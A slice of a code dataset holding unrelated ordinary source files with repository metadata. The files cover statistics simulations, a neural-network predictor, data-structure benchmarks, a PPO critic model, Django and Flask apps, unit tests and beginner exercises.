plot_result(intervals,freq,mu,sigma,a,var,name):\n\n\tplt.figure(figsize=(20,12))\n\tplt.title(\"Marginal Density Plot of %s \\n a = %s\" % (var,a),fontsize=20)\n\tplt.ylabel(\"Scaled frequency Values\", fontsize=15)\n\tplt.xlabel(\"Intervals\", fontsize=15)\n\tplt.plot(intervals[1:], freq[1:])\n\tplt.scatter(intervals[1:], freq[1:])\n\n\tr = np.linspace(mu-4*sigma,mu+4*sigma,5000,endpoint=True)\n\ty = []\n\tfor i in range(5000):\n\t\ty.append(normal_density(mu, sigma, r[i]))\n\tplt.plot(r, y, color='r')\n\tplt.savefig(name)\n\tplt.clf()\n\n\n\n#Function to Plot 3D density for different values of a\ndef plot3D_density(X1,X2,mu1,mu2,sigma1,sigma2,a,rounds,name):\n\n\tX_start = mu1 - 4*sigma1\n\tX_end = mu1 + 4*sigma1\n\tY_start = mu2 - 4*sigma2\n\tY_end = mu2 + 4*sigma2\n\tX_intervals = np.linspace(X_start,X_end,100,endpoint=True)\n\tY_intervals = np.linspace(Y_start,Y_end,100,endpoint=True)\n\tXY_freq = np.array([[0]*100]*100)\n\n\n\tX_interval_size = (X_end-X_start)/100\n\tY_interval_size = (Y_end-Y_start)/100\n\n\t#Calculating frequency of intervals\n\tfor i in range(rounds):\n\t\tj = math.floor((X1[i]-X_start)/X_interval_size)\n\t\tk = math.floor((X2[i]-Y_start)/Y_interval_size)\n\t\tif j>=100 or k>=100:\n\t\t\tcontinue\n\t\tXY_freq[j][k] = XY_freq[j][k] + 1\n\n\n\t#Plotting Simulated Density\n\n\tfig = plt.figure()\n\tax = fig.gca(projection='3d')\n\tax.set_title(\"Bivariate Density of Simulated Points (X) in 3D \\n a = %s\" % a)\n\tax.set_xlabel('X axis')\n\tax.set_ylabel('Y axis')\n\tax.set_zlabel('Z axis')\n\n\tX_intervals, Y_intervals = np.meshgrid(X_intervals, Y_intervals)\n\tax.plot_surface(X_intervals, Y_intervals, XY_freq,cmap=cm.coolwarm)\n\tplt.savefig(name+\"_3\")\n\tplt.clf()\n\n\n\t##Plotting Actual Bivariate Normal density\n\n\tX = np.linspace(X_start,X_end, 1000,endpoint=True)\n\tY = np.linspace(Y_start,Y_end, 1000,endpoint=True)\n\tX, Y = np.meshgrid(X, Y)\n\n\tmu = np.array([5, 8])\n\n\t#Handling Corner Case for a = 1\n\tif a!=1:\n\t\tSigma = np.array([[ 1. , 2.0*a], [2.0*a, 4.]])\n\t\n\tif a==1:\n\t\tSigma = np.array([[ 1. 
, 2.0*0.99999], [2.0*0.99999, 4.]])\n\n\tpos = np.empty(X.shape + (2,))\n\tpos[:, :, 0] = X\n\tpos[:, :, 1] = Y\n\n\tF = multivariate_normal(mu, Sigma)\n\tZ = F.pdf(pos)\n\n\tfig = plt.figure()\n\tax = fig.gca(projection='3d')\n\tax.set_title(\"Actual Bivariate Density of X in 3D \\n a = %s\" % a)\n\tax.set_xlabel('X axis')\n\tax.set_ylabel('Y axis')\n\tax.set_zlabel('Z axis')\n\tax.plot_surface(X,Y,Z,cmap=cm.coolwarm,linewidth=0, antialiased=True)\n\tplt.savefig(name+\"_4\")\n\tplt.clf()\n\n\n\n\n\n#Function to Simulate Bivariate Normal\ndef Simulate(a,name):\n\n\tmu1 = 5\n\tmu2 = 8\n\n\tsigma1 = 1\n\tsigma2 = 2\n\n\trho = a\n\n\trounds = 1000\n\tZ1 = np.random.normal(0,1,rounds)\n\tZ2 = np.random.normal(0,1,rounds)\n\n\tX1 = mu1 + sigma1*Z1\n\tX2 = mu2 + (rho * sigma2 * Z1) + (math.sqrt(1 - rho**2) * sigma2 * Z2) \n\n\n\tintervals = []\n\tval = mu1-5\n\tfor i in range(50):\n\t\tintervals.append(round(val,2))\n\t\tval += 0.2\t\n\n\n\tfreq = [0]*50\n\tcalculate_frequency(X1, intervals, freq, sigma1,rounds)\n\tplot_result(intervals, freq, mu1, sigma1,a,\"X1\",name+\"_1\")\n\n\n\tintervals.clear()\n\tval = mu2-8\n\tfor i in range(80):\n\t\tintervals.append(round(val,2))\n\t\tval += 0.2\t\n\n\n\tfreq = [0]*80\n\tcalculate_frequency(X2, intervals, freq, sigma2,rounds)\n\tplot_result(intervals, freq, mu2, sigma2,a,\"X2\",name+\"_2\")\n\n\n\tplot3D_density(X1,X2,mu1,mu2,sigma1,sigma2,a,rounds,name)\n\n\n\n\n\n\n\n\n#Calling function to simulate for different values of a\nSimulate(-0.5,\"plot1\")\nSimulate(0,\"plot2\")\nSimulate(0.5,\"plot3\")\nSimulate(1,\"plot4\")\n\n\n","repo_name":"humamkhan2k/MA-323-Monte-Carlo-Simulation","sub_path":"LAB 6/180123057_MOHAMMAD_HUMAM_KHAN.py","file_name":"180123057_MOHAMMAD_HUMAM_KHAN.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30858742349","text":"from __future__ import print_function, unicode_literals\n\nfrom PyInquirer import style_from_dict, Token, prompt, Separator\nfrom pprint import pprint\n\n\ndef present_menu(suggestions):\n\n style = style_from_dict(\n {\n Token.Separator: \"#cc5454\",\n Token.QuestionMark: \"#673ab7 bold\",\n Token.Selected: \"#cc5454\", # default\n Token.Pointer: \"#673ab7 bold\",\n Token.Instruction: \"\", # default\n Token.Answer: \"#f44336 bold\",\n Token.Question: \"\",\n }\n )\n\n questions = [\n {\n \"type\": \"checkbox\",\n \"message\": \"Select which jobs to share on LinkedIn:\",\n \"name\": \"posts\",\n \"choices\": [],\n \"validate\": lambda answer: \"You must choose at least one option.\"\n if len(answer) == 0\n else True,\n }\n ]\n\n # Load menu options.\n questions[0][\"choices\"].append(Separator(\"{:=^40}\".format(\"OPTIONS\")))\n for job in suggestions:\n questions[0][\"choices\"].append(\n {\"name\": \"{:<32}: {:>32}\".format(job[\"title\"], job[\"guid\"])}\n )\n questions[0][\"choices\"].append({\"name\": \"None\"})\n\n answers = prompt(questions, style=style)\n if \"None\" in answers[\"posts\"]:\n return None\n return answers\n","repo_name":"jtroussard/linkedin_assist","sub_path":"linkedin_assist/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33256694371","text":"# Hayden Feddock\r\n# 3/30/2023\r\n\r\nimport numpy as np\r\nimport sigmoid\r\n\r\n# Function that performs feed-forward propagation algorithm\r\ndef predict(Theta1, Theta2, X):\r\n \r\n # Create the 
bias term a^1_0\r\n    a1_0 = np.ones([X.shape[0], 1])\r\n    \r\n    # Add the bias term to the inputs a^1\r\n    a1 = np.hstack([a1_0, X])\r\n    \r\n    # Create the hidden layer a^2 by computing the sigmoid function of the dot product of theta1 and a^1\r\n    a2 = sigmoid.sigmoid(a1 @ Theta1.T)\r\n    \r\n    # Create the bias term a^2_0\r\n    a2_0 = np.ones([a1.shape[0], 1])\r\n    \r\n    # Add the bias term to the inputs a^2\r\n    a2 = np.hstack([a2_0, a2])\r\n    \r\n    # Create the output layer h_x by computing the sigmoid function of the dot product of theta2 and a^2\r\n    h_x = sigmoid.sigmoid(a2 @ Theta2.T)\r\n    \r\n    # Predict the label for each class as the output with the highest probability (add 1 for proper class)\r\n    p = np.argmax(h_x, axis=1) + 1\r\n    \r\n    # Return the predicted class label and the array of output probabilities\r\n    return [p, h_x]","repo_name":"Feddockh/Learning_ML","sub_path":"HW_7/ps7_python_Feddock_Hayden/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21007486226","text":"\"\"\"\nsortedcontainers.sortedlist source code:\nhttps://grantjenks.com/docs/sortedcontainers/sortedlist.html\n\"\"\"\nimport sortedcontainers.sortedlist as sortedlist\nimport time\nimport random\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef measure_times(datastructure, dataset):\n    \"\"\"\n    Measures the run time of a function for different sizes of input and stores the results in a dictionary.\n    :param datastructure: Data structure to measure\n    :param dataset: Dictionary mapping size of input to list of run times\n    \"\"\"\n\n    start = 0\n    end = 0\n    random.seed(0)\n    n = 10\n    while end - start < 3:\n        # Increase size of input\n        n = n*10\n        # Generate random array of size n\n        arr = [random.randint(0, n) for _ in range(n)]\n\n        if dataset.get(n) == None:\n            dataset[n] = []\n        # Measure run time if data structure is a multiset\n        if type(datastructure) == sortedlist.SortedList:\n            start = time.time()\n            for i in arr:\n                datastructure.add(i)\n            end = time.time()\n            # Store run time\n            dataset[n].append((end - start)/n)\n\n        # Measure run time if data structure is a vector\n        else:\n            start = time.time()\n            for i in arr:\n                # Run binary search to find index to insert element\n                left = 0\n                right = len(datastructure) - 1\n                mid = 0\n                while left <= right:\n                    mid = (left + right) // 2\n                    if datastructure[mid] < i:\n                        left = mid + 1\n                    elif datastructure[mid] > i:\n                        right = mid - 1\n                    else:\n                        break\n                # Insert element: at mid when an equal element was found,\n                # otherwise at left, the final insertion point of the search\n                if left <= right:\n                    datastructure.insert(mid, i)\n                else:\n                    datastructure.insert(left, i)\n            end = time.time()\n            # Store run time\n            dataset[n].append((end - start)/n)\n\n\n    print(type(datastructure),\" n: \",n)\n\n\nif __name__ == \"__main__\":\n    # Data structures\n    multiset = sortedlist.SortedList()\n    vector = []\n\n    # Dictionary mapping size of input to list of run times\n    vector_times = {}\n    multiset_times = {}\n\n    for i in range(10):\n        # Measure run times\n        measure_times(vector, vector_times)\n        measure_times(multiset, multiset_times)\n\n        # Reset data structures\n        vector = []\n        multiset = sortedlist.SortedList()\n\n    # Plot results\n    df = 
pd.DataFrame.from_dict(multiset_times, orient='index')\n df = df.transpose()\n df = df.melt(var_name='n', value_name='time')\n df['n'] = df['n'].astype(int)\n df['time'] = df['time'].astype(float)\n sns.lineplot(x='n', y='time', data=df)\n plt.title('Binary Search Tree Insertion Time ')\n plt.savefig('bst_insertion.png')\n plt.clf()\n","repo_name":"sidb70/Algorithm-Engineering-Course-Project","sub_path":"Vector vs BST/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27219651253","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras import regularizers\n\nclass myModel(tf.keras.Model):\n def __init__(self, hparams):\n super(myModel, self).__init__()\n self.hparams = hparams\n\n # Define layers here\n self.Message = tf.keras.models.Sequential()\n self.Message.add(keras.layers.Dense(self.hparams['link_state_dim'],\n activation=tf.nn.selu, name=\"FirstLayer\"))\n\n self.Update = tf.keras.layers.GRUCell(self.hparams['link_state_dim'], dtype=tf.float32)\n\n self.Readout = tf.keras.models.Sequential()\n self.Readout.add(keras.layers.Dense(self.hparams['readout_units'],\n activation=tf.nn.selu,\n kernel_regularizer=regularizers.l2(hparams['l2']),\n name=\"Readout1\"))\n self.Readout.add(keras.layers.Dense(self.hparams['readout_units'],\n activation=tf.nn.selu,\n kernel_regularizer=regularizers.l2(hparams['l2']),\n name=\"Readout2\"))\n self.Readout.add(keras.layers.Dense(1, kernel_regularizer=regularizers.l2(hparams['l2']),\n name=\"Readout3\"))\n\n def build(self, input_shape=None):\n # Create the weights of the layer\n self.Message.build(input_shape=tf.TensorShape([None, self.hparams['link_state_dim']*2]))\n self.Update.build(input_shape=tf.TensorShape([None,self.hparams['link_state_dim']]))\n self.Readout.build(input_shape=[None, self.hparams['link_state_dim']])\n self.built = True\n\n #@tf.function\n def call(self, link_state, first_critic, second_critic, num_edges_critic, training=False):\n\n # Execute T times\n for _ in range(self.hparams['T']):\n # We have the combination of the hidden states of the main nodes with the neighbours\n mainNodes = tf.gather(link_state, first_critic)\n neighNodes = tf.gather(link_state, second_critic)\n\n nodesConcat = tf.concat([mainNodes, neighNodes], axis=1)\n\n ### 1.a Message passing for node link with all it's neighbours\n outputs = self.Message(nodesConcat)\n\n ### 1.b Sum of output values according to link id index\n edges_inputs = tf.math.unsorted_segment_sum(data=outputs, segment_ids=second_critic, num_segments=num_edges_critic)\n\n ### 2. 
Update for each link\n # GRUcell needs a 3D tensor as state because there is a matmul: Wrap the link state\n outputs, links_state_list = self.Update(edges_inputs, [link_state])\n\n link_state = links_state_list[0]\n\n # Perform sum of all hidden states\n edges_combi_outputs = tf.math.reduce_sum(links_state_list, axis=1)\n\n r = self.Readout(edges_combi_outputs, training=training)\n return r","repo_name":"paulalmasan/DRL-GNN-PPO","sub_path":"PPO/criticPPO.py","file_name":"criticPPO.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"30115683653","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport mptt.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('crm', '0001_initial'),\n ('dm', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Article',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('code', models.CharField(max_length=128, verbose_name='code')),\n ('description', models.CharField(max_length=255, verbose_name='description')),\n ('measure_unit', models.CharField(max_length=10, null=True, verbose_name='measure unit', blank=True)),\n ('packaging', models.PositiveIntegerField(default=1, verbose_name='standard packaging')),\n ('enabled', models.BooleanField(default=True, verbose_name='enabled')),\n ('control_stock', models.BooleanField(default=False, verbose_name='control stock')),\n ('stock', models.PositiveIntegerField(default=0, verbose_name='stock')),\n ('stock_alert', models.PositiveIntegerField(default=0, verbose_name='stock alert')),\n ],\n options={\n 'ordering': ['-id'],\n 'verbose_name': 'article',\n 'verbose_name_plural': 'articles',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Brand',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50, verbose_name='name')),\n ],\n options={\n 'ordering': ['name'],\n 'verbose_name': 'brand',\n 'verbose_name_plural': 'brands',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Group',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50, verbose_name='name')),\n ('lft', models.PositiveIntegerField(editable=False, db_index=True)),\n ('rght', models.PositiveIntegerField(editable=False, db_index=True)),\n ('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),\n ('level', models.PositiveIntegerField(editable=False, db_index=True)),\n ('parent', mptt.fields.TreeForeignKey(related_name='children', blank=True, to='wm.Group', null=True)),\n ],\n options={\n 'verbose_name': 'group',\n 'verbose_name_plural': 'groups',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SupplierCode',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('code', models.CharField(max_length=50, verbose_name='code')),\n ('article', models.ForeignKey(verbose_name='article', to='wm.Article')),\n ('company', models.ForeignKey(verbose_name='company', to='crm.Company')),\n ],\n options={\n 'verbose_name': 'supplier code',\n 'verbose_name_plural': 'supplier codes',\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='suppliercode',\n 
unique_together=set([('article', 'company')]),\n ),\n migrations.AddField(\n model_name='article',\n name='brand',\n field=models.ForeignKey(verbose_name='brand', blank=True, to='wm.Brand', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='article',\n name='documents',\n field=models.ManyToManyField(related_name='articles', null=True, verbose_name='documents', to='dm.Document', blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='article',\n name='group',\n field=models.ForeignKey(verbose_name='group', to='wm.Group'),\n preserve_default=True,\n ),\n migrations.AlterUniqueTogether(\n name='article',\n unique_together=set([('code', 'brand')]),\n ),\n ]\n","repo_name":"jantoniomartin/django-machinery","sub_path":"wm/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4477452299","text":"# Given an array of integers, find the length of the longest sub-array with a sum that equals 0.\n\n# Examples: \n\n# Input: arr[] = {15, -2, 2, -8, 1, 7, 10, 23};\n# Output: 5\n# Explanation: The longest sub-array with \n# elements summing up-to 0 is {-2, 2, -8, 1, 7}\n\n# BruteForce:- This involves the use of brute force where two nested loops are used. \n# The outer loop is used to fix the starting position of the sub-array, and the inner loop is used for\n# the ending position of the sub-array and if the sum of elements is equal to zero, then increase the count\n\n# Efficient Approach: The brute force solution is calculating the sum of each and every sub-array and checking whether \n# the sum is zero or not. Let’s now try to improve the time complexity by taking an extra space of ‘n’ length. \n# The new array will store the sum of all the elements up to that index. The sum-index pair will be stored in a hash-map. \n# A Hash map allows insertion and deletion of key-value pair in constant time. Therefore, the time complexity remains unaffected.\n# So, if the same value appears twice in the array, it will be guaranteed that the particular array will be a zero-sum sub-array. 
\n\ndef findLongestSubarrayZero(nums):\n ans=0\n hmp={}\n s=0\n for i in range(len(nums)):\n s+=nums[i]\n if s== 0:\n ans=i+1\n else:\n if s not in hmp:\n hmp[s]=i\n else:\n ans=max(ans,i-hmp[s])\n return ans\n\nnums=[15, -2, 2, -8, 1, 7, 10, 23]\nprint(findLongestSubarrayZero(nums))\n \n \n ","repo_name":"thekuldeep07/SDE-SHEET","sub_path":"longestSubarraywithSum Zero.py","file_name":"longestSubarraywithSum Zero.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41789718690","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('freelance_utils', '0003_auto_20150805_1907'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='account',\n name='services',\n field=models.ManyToManyField(to='freelance_utils.Service'),\n ),\n ]\n","repo_name":"PyUnchained/freelance_utils","sub_path":"migrations/0004_auto_20150805_1907.py","file_name":"0004_auto_20150805_1907.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38581759329","text":"from django.shortcuts import render\nfrom .exchanger import Exchanger\nfrom .forms import ExchangeForm, HistoryForm\nfrom .currencies import Currencies\nfrom django.http import HttpResponseRedirect\nimport arrow\n\n\nexch = Exchanger()\ncurrencies = Currencies()\n\ntry: \n exch.currency_live\nexcept AttributeError:\n exch.get_live_currency()\n\ndef index(request):\n return HttpResponseRedirect('/exchange/?from=eur&to=kzt&amount=1')\n\ndef exchanger_form(request):\n if request.method == 'POST':\n form = ExchangeForm(request.POST)\n if form.is_valid():\n from_curr = form.cleaned_data[\"from_currency\"]\n to_curr = form.cleaned_data[\"to_currency\"]\n amt = form.cleaned_data[\"amount\"]\n return HttpResponseRedirect('/exchange/?from={}&to={}&amount={}'.format(from_curr, to_curr, amt))\n\n else:\n from_curr, to_curr, amt = validate_url_params(request)\n form = ExchangeForm(initial={\n 'from_currency': from_curr,\n 'to_currency': to_curr,\n 'amount': amt\n })\n \n result = exch.exchange(from_curr, to_curr, float(amt))\n\n return render(request, 'exchangeapp/exchanger_form.html', {\n 'form': form, \n 'exchange_result': round(result, 3), \n 'from': from_curr.upper(),\n 'to': to_curr.upper(),\n 'amt': amt\n })\n\ndef history(request):\n try:\n exch.two_week_history\n except AttributeError:\n exch.get_two_week_history()\n\n if request.method == 'POST':\n form = HistoryForm(request.POST)\n if form.is_valid():\n from_curr = form.cleaned_data[\"from_currency\"]\n to_curr = form.cleaned_data[\"to_currency\"]\n return HttpResponseRedirect('/history/?from={}&to={}'.format(from_curr, to_curr))\n\n else:\n from_curr, to_curr, _ = validate_url_params(request)\n form = HistoryForm(initial={\n 'from_currency': from_curr,\n 'to_currency': to_curr\n })\n changes, current = cross_rate_changes(from_curr, to_curr)\n\n return render(request, 'exchangeapp/history.html', {\n 'form': form, \n 'changes': changes, \n 'current': round(current, 5)\n })\n\ndef cross_rate_changes(from_curr, to_curr):\n changes = {}\n for i in range(1, 15):\n arrow_obj = arrow.now().shift(days=-i)\n rate = exch.exchange_past(from_curr, to_curr, 1, arrow_obj.format('MMM DD, YYYY'))\n changes[arrow_obj.format('MMM DD, YYYY')] = round(rate, 5)\n return [changes, 
exch.exchange(from_curr, to_curr, 1)]\n\ndef validate_url_params(request):\n    from_curr = request.GET.get('from', 'eur')\n    from_curr = from_curr if from_curr.lower() in currencies.as_list() else 'eur'\n    to_curr = request.GET.get('to', 'kzt')\n    to_curr = to_curr if to_curr.lower() in currencies.as_list() else 'kzt'\n    amt = request.GET.get('amount', 1)\n    try:\n        amt = abs(float(amt))\n    except ValueError:\n        amt = 1\n    return [from_curr, to_curr, amt]","repo_name":"andrijasinski/exchanger","sub_path":"exchangeapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30947100860","text":"import requests\nimport json\nimport time\n\n# api = \"http://103.247.219.34/api/v2\"\napi = \"http://172.10.0.52:8000/api/v2\"\n\ndef get_identity(uid):\n    try:\n        r = requests.get(api+\"/user/\"+uid)\n        y = json.loads(r.content)\n        data = {\"status\":y[\"status\"],\"name\":y[\"name\"]}\n        x = json.dumps(data)\n        return x\n    except Exception as e:\n        print(e)\n\ndef post_attendance(json,image):\n    try:\n        r = requests.post(api+\"/attendance/\",files=image,data=json,headers={\"Accept\":\"application/json\"})\n        print(r.content)\n    except Exception as e:\n        print(e)\n\ndef post_register(image,json):\n    try:\n        r = requests.post(api+\"/register/verify\",files=image,data=json,headers={\"Accept\":\"application/json\"})\n        print(r.content)\n    except Exception as e:\n        print(e)\n\ndef track(jsons):\n    try:\n        time.sleep(3)\n        r = requests.post(api+\"/detect/\",data=jsons,headers={\"Accept\":\"application/json\"})\n        print(r.status_code)\n        # y = json.loads(r.content)\n        # if y[\"status\"] == \"true\":\n        #     print(\"Deteksi Berhasil\")\n    except Exception as e:\n        print(e)","repo_name":"AthanatiusC/V-CORE","sub_path":"Face/LBPH/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45178508206","text":"#!../venv/bin/python\nimport unittest\n\nfrom flask import Flask\nfrom flask.ext.testing import TestCase\n\nimport fixtures\nimport models\n\nclass ShiftPersonTestCase(TestCase):\n    database_uri = \"sqlite:///shiftperson_unittest.db\"\n    app = Flask(__name__)\n    app.config['SQLALCHEMY_DATABASE_URI'] = database_uri\n\n\n    def create_app(self):\n        app = Flask(__name__)\n        app.config['SQLALCHEMY_DATABASE_URI'] = self.database_uri\n        return app\n\n    @classmethod\n    def setUpClass(self):\n        models.create_tables(self.app)\n        fixtures.install(self.app, *fixtures.shift_test_data)\n        self.db = models.init_app(self.app)\n\n    @classmethod\n    def tearDownClass(self):\n        self.db.session.remove()\n        self.db.drop_all()\n\n    def resetDB(self):\n        self.db.session.remove()\n        self.db.drop_all()\n        models.create_tables(self.app)\n        fixtures.install(self.app, *fixtures.shift_test_data)\n        self.db = models.init_app(self.app)\n\n\n    \"\"\" Test that shift_person relationships are defined and the model represents them correctly. 
\"\"\"\n def test_shiftperson_model(self):\n current = models.ShiftPerson.query.filter_by(pk=1).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 1)\n self.assertEqual(current.personFK, 3)\n \n current = models.ShiftPerson.query.filter_by(pk=2).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 1)\n self.assertEqual(current.personFK, 4)\n \n current = models.ShiftPerson.query.filter_by(pk=3).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 2)\n self.assertEqual(current.personFK, 4)\n \n current = models.ShiftPerson.query.filter_by(pk=4).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 2)\n self.assertEqual(current.personFK, 5)\n \n current = models.ShiftPerson.query.filter_by(pk=5).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 3)\n self.assertEqual(current.personFK, 3)\n \n current = models.ShiftPerson.query.filter_by(pk=6).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 3)\n self.assertEqual(current.personFK, 5)\n \n current = models.ShiftPerson.query.filter_by(pk=7).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 4)\n self.assertEqual(current.personFK, 3)\n \n current = models.ShiftPerson.query.filter_by(pk=8).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 4)\n self.assertEqual(current.personFK, 4)\n \n current = models.ShiftPerson.query.filter_by(pk=9).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 4)\n self.assertEqual(current.personFK, 5)\n\n\n \"\"\" Test that we can retrieve the shift from the shift-person assignment. \"\"\"\n def test_shiftperson_shift_relationship(self):\n # Define prerequisite data.\n key = 8\n personKey = 4\n # Retrieve the target object directly.\n direct = models.Person.query.filter_by(entityFK=personKey).first()\n self.assertIsNotNone(direct)\n self.assertEqual(direct.entityFK, personKey)\n # Retrieve the containing object.\n host = models.ShiftPerson.query.filter_by(pk=key).first()\n self.assertIsNotNone(host)\n self.assertEqual(host.personFK, direct.entityFK)\n # Retrieve the target object through the containing object.\n target = host.person\n self.assertIsNotNone(target)\n self.assertEqual(direct.__repr__(), target.__repr__())\n\n\n \"\"\" Test adding a Shift-Person assignment to the database \"\"\"\n def test_shiftperson_add(self):\n # Verify state of related tables before operation.\n shiftPersonCount = models.ShiftPerson.query.count()\n shiftCount = models.Shift.query.count()\n personCount = models.Person.query.count()\n \n # Define prerequisite data.\n shiftKey=1\n personKey=5\n target = models.ShiftPerson(shiftFK=shiftKey, personFK=personKey)\n\n # Verify that the data does not already exist.\n fetched = models.ShiftPerson.query.filter_by(shiftFK=shiftKey, personFK=personKey).first()\n self.assertIsNone(fetched)\n \n # Perform the operation.\n self.db.session.add(target)\n self.db.session.commit()\n\n # Verify that the data was added, and only added once.\n fetchedList = models.ShiftPerson.query.filter_by(shiftFK=shiftKey, personFK=personKey)\n self.assertIsNotNone(fetchedList)\n count = 0\n for item in fetchedList:\n self.assertEqual(item.shiftFK, shiftKey)\n self.assertEqual(item.personFK, personKey)\n count += 1\n self.assertEqual(count, 1)\n \n # Verify state of related tables after operation.\n shiftPersonCountAfter = models.ShiftPerson.query.count()\n shiftCountAfter = models.Shift.query.count()\n 
personCountAfter = models.Person.query.count()\n self.assertTrue(shiftPersonCountAfter == shiftPersonCount + 1) \n self.assertTrue(shiftCountAfter == shiftCount)\n self.assertTrue(personCountAfter == personCount)\n\n\n \"\"\" Test deleting a shift-person assignment. \"\"\"\n def test_shiftperson_delete(self):\n # Verify state of related tables before operation.\n shiftPersonCount = models.ShiftPerson.query.count()\n shiftCount = models.Shift.query.count()\n personCount = models.Person.query.count()\n \n # Define required test data.\n key = 9\n\n # Verify that prerequisite data exists.\n target = models.ShiftPerson.query.filter_by(pk=key).first()\n self.assertIsNotNone(target)\n\n # Perform the operation.\n self.db.session.delete(target)\n self.db.session.commit()\n\n # Verify that the record has been removed.\n target = models.ShiftPerson.query.filter_by(pk=key).first()\n self.assertIsNone(target)\n \n # Verify state of related tables after operation.\n shiftPersonCountAfter = models.ShiftPerson.query.count()\n shiftCountAfter = models.Shift.query.count()\n personCountAfter = models.Person.query.count()\n self.assertTrue(shiftPersonCountAfter == shiftPersonCount - 1) \n self.assertTrue(shiftCountAfter == shiftCount)\n self.assertTrue(personCountAfter == personCount)\n\n\ndef suite():\n # Define the container for this module's tests.\n suite = unittest.TestSuite()\n\n # Add tests to suite.\n suite.addTest(ShiftPersonTestCase('test_shiftperson_model'))\n suite.addTest(ShiftPersonTestCase('test_shiftperson_shift_relationship'))\n suite.addTest(ShiftPersonTestCase('test_shiftperson_add'))\n suite.addTest(ShiftPersonTestCase('test_shiftperson_delete'))\n \n return suite\n \n\nif __name__ == \"__main__\":\n unittest.TextTestRunner().run(suite())\n","repo_name":"umworkma/Comp4350","sub_path":"ESA/unit_tests_shiftperson.py","file_name":"unit_tests_shiftperson.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"30242700069","text":"#Program to illustrate simple for loop\r\nnumbers = [1, 10, 20, 30, 40, 50]\r\nsum = 0\r\n# Find sum of all the numbers using for loop \r\n\r\nfor i in range(0,len(numbers)):\r\n\tsum=sum+numbers[i]\r\nprint (\"The sum of numbers is\", sum ) # print sum here\r\n\r\n\r\ncolors = ['red', 'orange', 'green', 'yellow', 'white', 'violet']\r\nfor j in (colors):\r\n\tprint(j)\r\n# Similarly iterate over the given colors and print the colors\r\n","repo_name":"garladinne/python_codetantra","sub_path":"forloop1_list.py","file_name":"forloop1_list.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"11656914494","text":"\"\"\"\nurl : \nGiven two numbers 'N' and 'S' , find the largest number that can be formed with 'N' digits and whose sum of digits should be equal to 'S'.\n\nInput\n\nThe first line of input contains an integer T denoting the number of test cases. Then T test cases follow. 
